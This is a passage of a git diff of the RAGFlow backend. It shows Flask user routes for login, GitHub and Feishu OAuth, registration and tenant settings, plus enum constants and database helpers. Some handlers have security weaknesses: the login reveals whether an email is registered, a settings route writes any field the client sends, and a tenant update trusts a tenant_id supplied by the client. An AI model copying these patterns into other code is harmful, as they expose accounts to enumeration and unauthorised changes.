return server_error_response(e)
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import json
|
||||
import re
|
||||
from datetime import datetime
|
||||
|
||||
from flask import request, session, redirect
|
||||
from werkzeug.security import generate_password_hash, check_password_hash
|
||||
from flask_login import login_required, current_user, login_user, logout_user
|
||||
|
||||
from api.db.db_models import TenantLLM
|
||||
from api.db.services.llm_service import TenantLLMService, LLMService
|
||||
from api.utils.api_utils import server_error_response, validate_request
|
||||
from api.utils import get_uuid, get_format_time, decrypt, download_img, current_timestamp, datetime_format
|
||||
from api.db import UserTenantRole, LLMType, FileType
|
||||
from api.settings import RetCode, GITHUB_OAUTH, FEISHU_OAUTH, CHAT_MDL, EMBEDDING_MDL, ASR_MDL, IMAGE2TEXT_MDL, PARSERS, \
|
||||
API_KEY, \
|
||||
LLM_FACTORY, LLM_BASE_URL, RERANK_MDL
|
||||
from api.db.services.user_service import UserService, TenantService, UserTenantService
|
||||
from api.db.services.file_service import FileService
|
||||
from api.settings import stat_logger
|
||||
from api.utils.api_utils import get_json_result, construct_response
|
||||
|
||||
|
||||
@manager.route('/login', methods=['POST', 'GET'])
|
||||
def login():
|
||||
if not request.json:
|
||||
return get_json_result(data=False,
|
||||
retcode=RetCode.AUTHENTICATION_ERROR,
|
||||
retmsg='Unauthorized!')
|
||||
|
||||
email = request.json.get('email', "")
|
||||
users = UserService.query(email=email)
|
||||
if not users:
|
||||
return get_json_result(data=False,
|
||||
retcode=RetCode.AUTHENTICATION_ERROR,
|
||||
retmsg=f'Email: {email} is not registered!')
|
||||
|
||||
password = request.json.get('password')
|
||||
try:
|
||||
password = decrypt(password)
|
||||
except BaseException:
|
||||
return get_json_result(data=False,
|
||||
retcode=RetCode.SERVER_ERROR,
|
||||
retmsg='Fail to crypt password')
|
||||
|
||||
user = UserService.query_user(email, password)
|
||||
if user:
|
||||
response_data = user.to_json()
|
||||
user.access_token = get_uuid()
|
||||
login_user(user)
|
||||
user.update_time = current_timestamp(),
|
||||
user.update_date = datetime_format(datetime.now()),
|
||||
user.save()
|
||||
msg = "Welcome back!"
|
||||
return construct_response(data=response_data, auth=user.get_id(), retmsg=msg)
|
||||
else:
|
||||
return get_json_result(data=False,
|
||||
retcode=RetCode.AUTHENTICATION_ERROR,
|
||||
retmsg='Email and password do not match!')
|
||||
|
||||
|
||||
@manager.route('/github_callback', methods=['GET'])
|
||||
def github_callback():
|
||||
import requests
|
||||
res = requests.post(GITHUB_OAUTH.get("url"),
|
||||
data={
|
||||
"client_id": GITHUB_OAUTH.get("client_id"),
|
||||
"client_secret": GITHUB_OAUTH.get("secret_key"),
|
||||
"code": request.args.get('code')},
|
||||
headers={"Accept": "application/json"})
|
||||
res = res.json()
|
||||
if "error" in res:
|
||||
return redirect("/?error=%s" % res["error_description"])
|
||||
|
||||
if "user:email" not in res["scope"].split(","):
|
||||
return redirect("/?error=user:email not in scope")
|
||||
|
||||
session["access_token"] = res["access_token"]
|
||||
session["access_token_from"] = "github"
|
||||
user_info = user_info_from_github(session["access_token"])
|
||||
email_address = user_info["email"]
|
||||
users = UserService.query(email=email_address)
|
||||
user_id = get_uuid()
|
||||
if not users:
|
||||
# User isn't try to register
|
||||
try:
|
||||
try:
|
||||
avatar = download_img(user_info["avatar_url"])
|
||||
except Exception as e:
|
||||
stat_logger.exception(e)
|
||||
avatar = ""
|
||||
users = user_register(user_id, {
|
||||
"access_token": session["access_token"],
|
||||
"email": email_address,
|
||||
"avatar": avatar,
|
||||
"nickname": user_info["login"],
|
||||
"login_channel": "github",
|
||||
"last_login_time": get_format_time(),
|
||||
"is_superuser": False,
|
||||
})
|
||||
if not users:
|
||||
raise Exception(f'Fail to register {email_address}.')
|
||||
if len(users) > 1:
|
||||
raise Exception(f'Same email: {email_address} exists!')
|
||||
|
||||
# Try to log in
|
||||
user = users[0]
|
||||
login_user(user)
|
||||
return redirect("/?auth=%s" % user.get_id())
|
||||
except Exception as e:
|
||||
rollback_user_registration(user_id)
|
||||
stat_logger.exception(e)
|
||||
return redirect("/?error=%s" % str(e))
|
||||
|
||||
# User has already registered, try to log in
|
||||
user = users[0]
|
||||
user.access_token = get_uuid()
|
||||
login_user(user)
|
||||
user.save()
|
||||
return redirect("/?auth=%s" % user.get_id())
|
||||
|
||||
|
||||
@manager.route('/feishu_callback', methods=['GET'])
|
||||
def feishu_callback():
|
||||
import requests
|
||||
app_access_token_res = requests.post(FEISHU_OAUTH.get("app_access_token_url"),
|
||||
data=json.dumps({
|
||||
"app_id": FEISHU_OAUTH.get("app_id"),
|
||||
"app_secret": FEISHU_OAUTH.get("app_secret")
|
||||
}),
|
||||
headers={"Content-Type": "application/json; charset=utf-8"})
|
||||
app_access_token_res = app_access_token_res.json()
|
||||
if app_access_token_res['code'] != 0:
|
||||
return redirect("/?error=%s" % app_access_token_res)
|
||||
|
||||
res = requests.post(FEISHU_OAUTH.get("user_access_token_url"),
|
||||
data=json.dumps({
|
||||
"grant_type": FEISHU_OAUTH.get("grant_type"),
|
||||
"code": request.args.get('code')
|
||||
}),
|
||||
headers={
|
||||
"Content-Type": "application/json; charset=utf-8",
|
||||
'Authorization': f"Bearer {app_access_token_res['app_access_token']}"
|
||||
})
|
||||
res = res.json()
|
||||
if res['code'] != 0:
|
||||
return redirect("/?error=%s" % res["message"])
|
||||
|
||||
if "contact:user.email:readonly" not in res["data"]["scope"].split(" "):
|
||||
return redirect("/?error=contact:user.email:readonly not in scope")
|
||||
session["access_token"] = res["data"]["access_token"]
|
||||
session["access_token_from"] = "feishu"
|
||||
user_info = user_info_from_feishu(session["access_token"])
|
||||
email_address = user_info["email"]
|
||||
users = UserService.query(email=email_address)
|
||||
user_id = get_uuid()
|
||||
if not users:
|
||||
# User isn't try to register
|
||||
try:
|
||||
try:
|
||||
avatar = download_img(user_info["avatar_url"])
|
||||
except Exception as e:
|
||||
stat_logger.exception(e)
|
||||
avatar = ""
|
||||
users = user_register(user_id, {
|
||||
"access_token": session["access_token"],
|
||||
"email": email_address,
|
||||
"avatar": avatar,
|
||||
"nickname": user_info["en_name"],
|
||||
"login_channel": "feishu",
|
||||
"last_login_time": get_format_time(),
|
||||
"is_superuser": False,
|
||||
})
|
||||
if not users:
|
||||
raise Exception(f'Fail to register {email_address}.')
|
||||
if len(users) > 1:
|
||||
raise Exception(f'Same email: {email_address} exists!')
|
||||
|
||||
# Try to log in
|
||||
user = users[0]
|
||||
login_user(user)
|
||||
return redirect("/?auth=%s" % user.get_id())
|
||||
except Exception as e:
|
||||
rollback_user_registration(user_id)
|
||||
stat_logger.exception(e)
|
||||
return redirect("/?error=%s" % str(e))
|
||||
|
||||
# User has already registered, try to log in
|
||||
user = users[0]
|
||||
user.access_token = get_uuid()
|
||||
login_user(user)
|
||||
user.save()
|
||||
return redirect("/?auth=%s" % user.get_id())
|
||||
|
||||
|
||||
def user_info_from_feishu(access_token):
|
||||
import requests
|
||||
headers = {"Content-Type": "application/json; charset=utf-8",
|
||||
'Authorization': f"Bearer {access_token}"}
|
||||
res = requests.get(
|
||||
f"https://open.feishu.cn/open-apis/authen/v1/user_info",
|
||||
headers=headers)
|
||||
user_info = res.json()["data"]
|
||||
user_info["email"] = None if user_info.get("email") == "" else user_info["email"]
|
||||
return user_info
|
||||
|
||||
|
||||
def user_info_from_github(access_token):
|
||||
import requests
|
||||
headers = {"Accept": "application/json",
|
||||
'Authorization': f"token {access_token}"}
|
||||
res = requests.get(
|
||||
f"https://api.github.com/user?access_token={access_token}",
|
||||
headers=headers)
|
||||
user_info = res.json()
|
||||
email_info = requests.get(
|
||||
f"https://api.github.com/user/emails?access_token={access_token}",
|
||||
headers=headers).json()
|
||||
user_info["email"] = next(
|
||||
(email for email in email_info if email['primary'] == True),
|
||||
None)["email"]
|
||||
return user_info
|
||||
|
||||
|
||||
@manager.route("/logout", methods=['GET'])
|
||||
@login_required
|
||||
def log_out():
|
||||
current_user.access_token = ""
|
||||
current_user.save()
|
||||
logout_user()
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route("/setting", methods=["POST"])
|
||||
@login_required
|
||||
def setting_user():
|
||||
update_dict = {}
|
||||
request_data = request.json
|
||||
if request_data.get("password"):
|
||||
new_password = request_data.get("new_password")
|
||||
if not check_password_hash(
|
||||
current_user.password, decrypt(request_data["password"])):
|
||||
return get_json_result(data=False, retcode=RetCode.AUTHENTICATION_ERROR, retmsg='Password error!')
|
||||
|
||||
if new_password:
|
||||
update_dict["password"] = generate_password_hash(decrypt(new_password))
|
||||
|
||||
for k in request_data.keys():
|
||||
if k in ["password", "new_password"]:
|
||||
continue
|
||||
update_dict[k] = request_data[k]
|
||||
|
||||
try:
|
||||
UserService.update_by_id(current_user.id, update_dict)
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
stat_logger.exception(e)
|
||||
return get_json_result(data=False, retmsg='Update failure!', retcode=RetCode.EXCEPTION_ERROR)
|
||||
|
||||
|
||||
@manager.route("/info", methods=["GET"])
|
||||
@login_required
|
||||
def user_profile():
|
||||
return get_json_result(data=current_user.to_dict())
|
||||
|
||||
|
||||
def rollback_user_registration(user_id):
|
||||
try:
|
||||
UserService.delete_by_id(user_id)
|
||||
except Exception as e:
|
||||
pass
|
||||
try:
|
||||
TenantService.delete_by_id(user_id)
|
||||
except Exception as e:
|
||||
pass
|
||||
try:
|
||||
u = UserTenantService.query(tenant_id=user_id)
|
||||
if u:
|
||||
UserTenantService.delete_by_id(u[0].id)
|
||||
except Exception as e:
|
||||
pass
|
||||
try:
|
||||
TenantLLM.delete().where(TenantLLM.tenant_id == user_id).execute()
|
||||
except Exception as e:
|
||||
pass
|
||||
|
||||
|
||||
def user_register(user_id, user):
|
||||
user["id"] = user_id
|
||||
tenant = {
|
||||
"id": user_id,
|
||||
"name": user["nickname"] + "‘s Kingdom",
|
||||
"llm_id": CHAT_MDL,
|
||||
"embd_id": EMBEDDING_MDL,
|
||||
"asr_id": ASR_MDL,
|
||||
"parser_ids": PARSERS,
|
||||
"img2txt_id": IMAGE2TEXT_MDL,
|
||||
"rerank_id": RERANK_MDL
|
||||
}
|
||||
usr_tenant = {
|
||||
"tenant_id": user_id,
|
||||
"user_id": user_id,
|
||||
"invited_by": user_id,
|
||||
"role": UserTenantRole.OWNER
|
||||
}
|
||||
file_id = get_uuid()
|
||||
file = {
|
||||
"id": file_id,
|
||||
"parent_id": file_id,
|
||||
"tenant_id": user_id,
|
||||
"created_by": user_id,
|
||||
"name": "/",
|
||||
"type": FileType.FOLDER.value,
|
||||
"size": 0,
|
||||
"location": "",
|
||||
}
|
||||
tenant_llm = []
|
||||
for llm in LLMService.query(fid=LLM_FACTORY):
|
||||
tenant_llm.append({"tenant_id": user_id,
|
||||
"llm_factory": LLM_FACTORY,
|
||||
"llm_name": llm.llm_name,
|
||||
"model_type": llm.model_type,
|
||||
"api_key": API_KEY,
|
||||
"api_base": LLM_BASE_URL
|
||||
})
|
||||
|
||||
if not UserService.save(**user):
|
||||
return
|
||||
TenantService.insert(**tenant)
|
||||
UserTenantService.insert(**usr_tenant)
|
||||
TenantLLMService.insert_many(tenant_llm)
|
||||
FileService.insert(file)
|
||||
return UserService.query(email=user["email"])
|
||||
|
||||
|
||||
@manager.route("/register", methods=["POST"])
|
||||
@validate_request("nickname", "email", "password")
|
||||
def user_add():
|
||||
req = request.json
|
||||
email_address = req["email"]
|
||||
|
||||
# Validate the email address
|
||||
if not re.match(r"^[\w\._-]+@([\w_-]+\.)+[\w-]{2,4}$", email_address):
|
||||
return get_json_result(data=False,
|
||||
retmsg=f'Invalid email address: {email_address}!',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
|
||||
# Check if the email address is already used
|
||||
if UserService.query(email=email_address):
|
||||
return get_json_result(
|
||||
data=False,
|
||||
retmsg=f'Email: {email_address} has already registered!',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
|
||||
# Construct user info data
|
||||
nickname = req["nickname"]
|
||||
user_dict = {
|
||||
"access_token": get_uuid(),
|
||||
"email": email_address,
|
||||
"nickname": nickname,
|
||||
"password": decrypt(req["password"]),
|
||||
"login_channel": "password",
|
||||
"last_login_time": get_format_time(),
|
||||
"is_superuser": False,
|
||||
}
|
||||
|
||||
user_id = get_uuid()
|
||||
try:
|
||||
users = user_register(user_id, user_dict)
|
||||
if not users:
|
||||
raise Exception(f'Fail to register {email_address}.')
|
||||
if len(users) > 1:
|
||||
raise Exception(f'Same email: {email_address} exists!')
|
||||
user = users[0]
|
||||
login_user(user)
|
||||
return construct_response(data=user.to_json(),
|
||||
auth=user.get_id(),
|
||||
retmsg=f"{nickname}, welcome aboard!")
|
||||
except Exception as e:
|
||||
rollback_user_registration(user_id)
|
||||
stat_logger.exception(e)
|
||||
return get_json_result(data=False,
|
||||
retmsg=f'User registration failure, error: {str(e)}',
|
||||
retcode=RetCode.EXCEPTION_ERROR)
|
||||
|
||||
|
||||
@manager.route("/tenant_info", methods=["GET"])
|
||||
@login_required
|
||||
def tenant_info():
|
||||
try:
|
||||
tenants = TenantService.get_by_user_id(current_user.id)[0]
|
||||
return get_json_result(data=tenants)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route("/set_tenant_info", methods=["POST"])
|
||||
@login_required
|
||||
@validate_request("tenant_id", "asr_id", "embd_id", "img2txt_id", "llm_id")
|
||||
def set_tenant_info():
|
||||
req = request.json
|
||||
try:
|
||||
tid = req["tenant_id"]
|
||||
del req["tenant_id"]
|
||||
TenantService.update_by_id(tid, req)
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
16
api/contants.py
Normal file
16
api/contants.py
Normal file
@ -0,0 +1,16 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
|
||||
NAME_LENGTH_LIMIT = 2 ** 10
|
||||
@ -1,93 +1,103 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from enum import Enum
|
||||
from enum import IntEnum
|
||||
from strenum import StrEnum
|
||||
|
||||
|
||||
class StatusEnum(Enum):
|
||||
VALID = "1"
|
||||
INVALID = "0"
|
||||
|
||||
|
||||
class UserTenantRole(StrEnum):
|
||||
OWNER = 'owner'
|
||||
ADMIN = 'admin'
|
||||
NORMAL = 'normal'
|
||||
|
||||
|
||||
class TenantPermission(StrEnum):
|
||||
ME = 'me'
|
||||
TEAM = 'team'
|
||||
|
||||
|
||||
class SerializedType(IntEnum):
|
||||
PICKLE = 1
|
||||
JSON = 2
|
||||
|
||||
|
||||
class FileType(StrEnum):
|
||||
PDF = 'pdf'
|
||||
DOC = 'doc'
|
||||
VISUAL = 'visual'
|
||||
AURAL = 'aural'
|
||||
VIRTUAL = 'virtual'
|
||||
FOLDER = 'folder'
|
||||
OTHER = "other"
|
||||
|
||||
|
||||
class LLMType(StrEnum):
|
||||
CHAT = 'chat'
|
||||
EMBEDDING = 'embedding'
|
||||
SPEECH2TEXT = 'speech2text'
|
||||
IMAGE2TEXT = 'image2text'
|
||||
|
||||
|
||||
class ChatStyle(StrEnum):
|
||||
CREATIVE = 'Creative'
|
||||
PRECISE = 'Precise'
|
||||
EVENLY = 'Evenly'
|
||||
CUSTOM = 'Custom'
|
||||
|
||||
|
||||
class TaskStatus(StrEnum):
|
||||
UNSTART = "0"
|
||||
RUNNING = "1"
|
||||
CANCEL = "2"
|
||||
DONE = "3"
|
||||
FAIL = "4"
|
||||
|
||||
|
||||
class ParserType(StrEnum):
|
||||
PRESENTATION = "presentation"
|
||||
LAWS = "laws"
|
||||
MANUAL = "manual"
|
||||
PAPER = "paper"
|
||||
RESUME = "resume"
|
||||
BOOK = "book"
|
||||
QA = "qa"
|
||||
TABLE = "table"
|
||||
NAIVE = "naive"
|
||||
PICTURE = "picture"
|
||||
ONE = "one"
|
||||
|
||||
|
||||
class FileSource(StrEnum):
|
||||
LOCAL = ""
|
||||
KNOWLEDGEBASE = "knowledgebase"
|
||||
S3 = "s3"
|
||||
|
||||
KNOWLEDGEBASE_FOLDER_NAME=".knowledgebase"
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from enum import Enum
|
||||
from enum import IntEnum
|
||||
from strenum import StrEnum
|
||||
|
||||
|
||||
class StatusEnum(Enum):
|
||||
VALID = "1"
|
||||
INVALID = "0"
|
||||
|
||||
|
||||
class UserTenantRole(StrEnum):
|
||||
OWNER = 'owner'
|
||||
ADMIN = 'admin'
|
||||
NORMAL = 'normal'
|
||||
|
||||
|
||||
class TenantPermission(StrEnum):
|
||||
ME = 'me'
|
||||
TEAM = 'team'
|
||||
|
||||
|
||||
class SerializedType(IntEnum):
|
||||
PICKLE = 1
|
||||
JSON = 2
|
||||
|
||||
|
||||
class FileType(StrEnum):
|
||||
PDF = 'pdf'
|
||||
DOC = 'doc'
|
||||
VISUAL = 'visual'
|
||||
AURAL = 'aural'
|
||||
VIRTUAL = 'virtual'
|
||||
FOLDER = 'folder'
|
||||
OTHER = "other"
|
||||
|
||||
|
||||
class LLMType(StrEnum):
|
||||
CHAT = 'chat'
|
||||
EMBEDDING = 'embedding'
|
||||
SPEECH2TEXT = 'speech2text'
|
||||
IMAGE2TEXT = 'image2text'
|
||||
RERANK = 'rerank'
|
||||
TTS = 'tts'
|
||||
|
||||
|
||||
class ChatStyle(StrEnum):
|
||||
CREATIVE = 'Creative'
|
||||
PRECISE = 'Precise'
|
||||
EVENLY = 'Evenly'
|
||||
CUSTOM = 'Custom'
|
||||
|
||||
|
||||
class TaskStatus(StrEnum):
|
||||
UNSTART = "0"
|
||||
RUNNING = "1"
|
||||
CANCEL = "2"
|
||||
DONE = "3"
|
||||
FAIL = "4"
|
||||
|
||||
|
||||
class ParserType(StrEnum):
|
||||
PRESENTATION = "presentation"
|
||||
LAWS = "laws"
|
||||
MANUAL = "manual"
|
||||
PAPER = "paper"
|
||||
RESUME = "resume"
|
||||
BOOK = "book"
|
||||
QA = "qa"
|
||||
TABLE = "table"
|
||||
NAIVE = "naive"
|
||||
PICTURE = "picture"
|
||||
ONE = "one"
|
||||
AUDIO = "audio"
|
||||
EMAIL = "email"
|
||||
KG = "knowledge_graph"
|
||||
|
||||
|
||||
class FileSource(StrEnum):
|
||||
LOCAL = ""
|
||||
KNOWLEDGEBASE = "knowledgebase"
|
||||
S3 = "s3"
|
||||
|
||||
|
||||
class CanvasType(StrEnum):
|
||||
ChatBot = "chatbot"
|
||||
DocBot = "docbot"
|
||||
|
||||
KNOWLEDGEBASE_FOLDER_NAME=".knowledgebase"
|
||||
|
||||
1890
api/db/db_models.py
1890
api/db/db_models.py
File diff suppressed because it is too large
Load Diff
@ -1,130 +1,135 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import operator
|
||||
from functools import reduce
|
||||
from typing import Dict, Type, Union
|
||||
|
||||
from api.utils import current_timestamp, timestamp_to_date
|
||||
|
||||
from api.db.db_models import DB, DataBaseModel
|
||||
from api.db.runtime_config import RuntimeConfig
|
||||
from api.utils.log_utils import getLogger
|
||||
from enum import Enum
|
||||
|
||||
|
||||
LOGGER = getLogger()
|
||||
|
||||
|
||||
@DB.connection_context()
|
||||
def bulk_insert_into_db(model, data_source, replace_on_conflict=False):
|
||||
DB.create_tables([model])
|
||||
|
||||
for i, data in enumerate(data_source):
|
||||
current_time = current_timestamp() + i
|
||||
current_date = timestamp_to_date(current_time)
|
||||
if 'create_time' not in data:
|
||||
data['create_time'] = current_time
|
||||
data['create_date'] = timestamp_to_date(data['create_time'])
|
||||
data['update_time'] = current_time
|
||||
data['update_date'] = current_date
|
||||
|
||||
preserve = tuple(data_source[0].keys() - {'create_time', 'create_date'})
|
||||
|
||||
batch_size = 1000
|
||||
|
||||
for i in range(0, len(data_source), batch_size):
|
||||
with DB.atomic():
|
||||
query = model.insert_many(data_source[i:i + batch_size])
|
||||
if replace_on_conflict:
|
||||
query = query.on_conflict(preserve=preserve)
|
||||
query.execute()
|
||||
|
||||
|
||||
def get_dynamic_db_model(base, job_id):
|
||||
return type(base.model(
|
||||
table_index=get_dynamic_tracking_table_index(job_id=job_id)))
|
||||
|
||||
|
||||
def get_dynamic_tracking_table_index(job_id):
|
||||
return job_id[:8]
|
||||
|
||||
|
||||
def fill_db_model_object(model_object, human_model_dict):
|
||||
for k, v in human_model_dict.items():
|
||||
attr_name = 'f_%s' % k
|
||||
if hasattr(model_object.__class__, attr_name):
|
||||
setattr(model_object, attr_name, v)
|
||||
return model_object
|
||||
|
||||
|
||||
# https://docs.peewee-orm.com/en/latest/peewee/query_operators.html
|
||||
supported_operators = {
|
||||
'==': operator.eq,
|
||||
'<': operator.lt,
|
||||
'<=': operator.le,
|
||||
'>': operator.gt,
|
||||
'>=': operator.ge,
|
||||
'!=': operator.ne,
|
||||
'<<': operator.lshift,
|
||||
'>>': operator.rshift,
|
||||
'%': operator.mod,
|
||||
'**': operator.pow,
|
||||
'^': operator.xor,
|
||||
'~': operator.inv,
|
||||
}
|
||||
|
||||
|
||||
def query_dict2expression(
|
||||
model: Type[DataBaseModel], query: Dict[str, Union[bool, int, str, list, tuple]]):
|
||||
expression = []
|
||||
|
||||
for field, value in query.items():
|
||||
if not isinstance(value, (list, tuple)):
|
||||
value = ('==', value)
|
||||
op, *val = value
|
||||
|
||||
field = getattr(model, f'f_{field}')
|
||||
value = supported_operators[op](
|
||||
field, val[0]) if op in supported_operators else getattr(
|
||||
field, op)(
|
||||
*val)
|
||||
expression.append(value)
|
||||
|
||||
return reduce(operator.iand, expression)
|
||||
|
||||
|
||||
def query_db(model: Type[DataBaseModel], limit: int = 0, offset: int = 0,
|
||||
query: dict = None, order_by: Union[str, list, tuple] = None):
|
||||
data = model.select()
|
||||
if query:
|
||||
data = data.where(query_dict2expression(model, query))
|
||||
count = data.count()
|
||||
|
||||
if not order_by:
|
||||
order_by = 'create_time'
|
||||
if not isinstance(order_by, (list, tuple)):
|
||||
order_by = (order_by, 'asc')
|
||||
order_by, order = order_by
|
||||
order_by = getattr(model, f'f_{order_by}')
|
||||
order_by = getattr(order_by, order)()
|
||||
data = data.order_by(order_by)
|
||||
|
||||
if limit > 0:
|
||||
data = data.limit(limit)
|
||||
if offset > 0:
|
||||
data = data.offset(offset)
|
||||
|
||||
return list(data), count
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import operator
|
||||
from functools import reduce
|
||||
from typing import Dict, Type, Union
|
||||
|
||||
from playhouse.pool import PooledMySQLDatabase
|
||||
|
||||
from api.utils import current_timestamp, timestamp_to_date
|
||||
|
||||
from api.db.db_models import DB, DataBaseModel
|
||||
from api.db.runtime_config import RuntimeConfig
|
||||
from api.utils.log_utils import getLogger
|
||||
from enum import Enum
|
||||
|
||||
|
||||
LOGGER = getLogger()
|
||||
|
||||
|
||||
@DB.connection_context()
|
||||
def bulk_insert_into_db(model, data_source, replace_on_conflict=False):
|
||||
DB.create_tables([model])
|
||||
|
||||
for i, data in enumerate(data_source):
|
||||
current_time = current_timestamp() + i
|
||||
current_date = timestamp_to_date(current_time)
|
||||
if 'create_time' not in data:
|
||||
data['create_time'] = current_time
|
||||
data['create_date'] = timestamp_to_date(data['create_time'])
|
||||
data['update_time'] = current_time
|
||||
data['update_date'] = current_date
|
||||
|
||||
preserve = tuple(data_source[0].keys() - {'create_time', 'create_date'})
|
||||
|
||||
batch_size = 1000
|
||||
|
||||
for i in range(0, len(data_source), batch_size):
|
||||
with DB.atomic():
|
||||
query = model.insert_many(data_source[i:i + batch_size])
|
||||
if replace_on_conflict:
|
||||
if isinstance(DB, PooledMySQLDatabase):
|
||||
query = query.on_conflict(preserve=preserve)
|
||||
else:
|
||||
query = query.on_conflict(conflict_target="id", preserve=preserve)
|
||||
query.execute()
|
||||
|
||||
|
||||
def get_dynamic_db_model(base, job_id):
|
||||
return type(base.model(
|
||||
table_index=get_dynamic_tracking_table_index(job_id=job_id)))
|
||||
|
||||
|
||||
def get_dynamic_tracking_table_index(job_id):
|
||||
return job_id[:8]
|
||||
|
||||
|
||||
def fill_db_model_object(model_object, human_model_dict):
|
||||
for k, v in human_model_dict.items():
|
||||
attr_name = 'f_%s' % k
|
||||
if hasattr(model_object.__class__, attr_name):
|
||||
setattr(model_object, attr_name, v)
|
||||
return model_object
|
||||
|
||||
|
||||
# https://docs.peewee-orm.com/en/latest/peewee/query_operators.html
|
||||
supported_operators = {
|
||||
'==': operator.eq,
|
||||
'<': operator.lt,
|
||||
'<=': operator.le,
|
||||
'>': operator.gt,
|
||||
'>=': operator.ge,
|
||||
'!=': operator.ne,
|
||||
'<<': operator.lshift,
|
||||
'>>': operator.rshift,
|
||||
'%': operator.mod,
|
||||
'**': operator.pow,
|
||||
'^': operator.xor,
|
||||
'~': operator.inv,
|
||||
}
|
||||
|
||||
|
||||
def query_dict2expression(
|
||||
model: Type[DataBaseModel], query: Dict[str, Union[bool, int, str, list, tuple]]):
|
||||
expression = []
|
||||
|
||||
for field, value in query.items():
|
||||
if not isinstance(value, (list, tuple)):
|
||||
value = ('==', value)
|
||||
op, *val = value
|
||||
|
||||
field = getattr(model, f'f_{field}')
|
||||
value = supported_operators[op](
|
||||
field, val[0]) if op in supported_operators else getattr(
|
||||
field, op)(
|
||||
*val)
|
||||
expression.append(value)
|
||||
|
||||
return reduce(operator.iand, expression)
|
||||
|
||||
|
||||
def query_db(model: Type[DataBaseModel], limit: int = 0, offset: int = 0,
|
||||
query: dict = None, order_by: Union[str, list, tuple] = None):
|
||||
data = model.select()
|
||||
if query:
|
||||
data = data.where(query_dict2expression(model, query))
|
||||
count = data.count()
|
||||
|
||||
if not order_by:
|
||||
order_by = 'create_time'
|
||||
if not isinstance(order_by, (list, tuple)):
|
||||
order_by = (order_by, 'asc')
|
||||
order_by, order = order_by
|
||||
order_by = getattr(model, f'f_{order_by}')
|
||||
order_by = getattr(order_by, order)()
|
||||
data = data.order_by(order_by)
|
||||
|
||||
if limit > 0:
|
||||
data = data.limit(limit)
|
||||
if offset > 0:
|
||||
data = data.offset(offset)
|
||||
|
||||
return list(data), count
|
||||
|
||||
@ -1,435 +1,184 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
